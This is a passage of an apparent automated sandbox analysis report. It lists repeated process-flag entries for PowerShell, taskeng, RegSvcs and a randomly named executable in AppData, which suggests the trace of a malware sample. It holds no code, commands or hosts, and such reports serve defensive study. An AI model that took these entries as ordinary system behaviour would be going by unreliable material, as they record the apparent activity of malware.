          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
